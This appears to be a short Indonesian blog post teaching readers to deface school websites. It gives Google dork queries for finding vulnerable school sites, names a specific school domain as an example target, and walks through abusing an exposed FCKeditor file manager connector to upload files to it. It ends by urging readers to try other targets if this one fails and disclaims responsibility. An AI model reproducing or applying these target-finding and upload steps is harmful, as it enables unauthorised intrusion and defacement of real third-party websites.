pertama kalian buka google lalu tulislah dork ini di google tersebut :
- inurl:/html/siswa.php?
- inurl:/html/alumni.php?
- inurl:/html/guru.php?
contoh :
http://www.sman1serangpanjang.sch.id/html/siswa.php?id=profil
selanjutnya langkah ke tiga, kita masukan exploit kita di target tersebut menjadi :
http://www.sman1serangpanjang.sch.id/editor/filemanager/connectors/test.htmlselanjutnya setelah masuk ganti Connectornya ASP menjadi PHP :
setelah itu upload file .txt kamu inget hanya file .txt yang bisa.
setelah selesai di upload dimana tempat filenya kita tadi itu mudah langsung saja kita masukan
userfiles/file/namafilekamu.txtcontoh :
http://www.sman1serangpanjang.sch.id/userfiles/file/namafilekamu.txtselesai dan jadi deh .. gmna berhasil gak .. kalo gak berhasil coba cari target yang lain ... inget semua yang kamu lakukan kami tidak bertanggung jawab ... sampai jumpa lain waktu
No comments:
Post a Comment
thank you for commenting on our blogs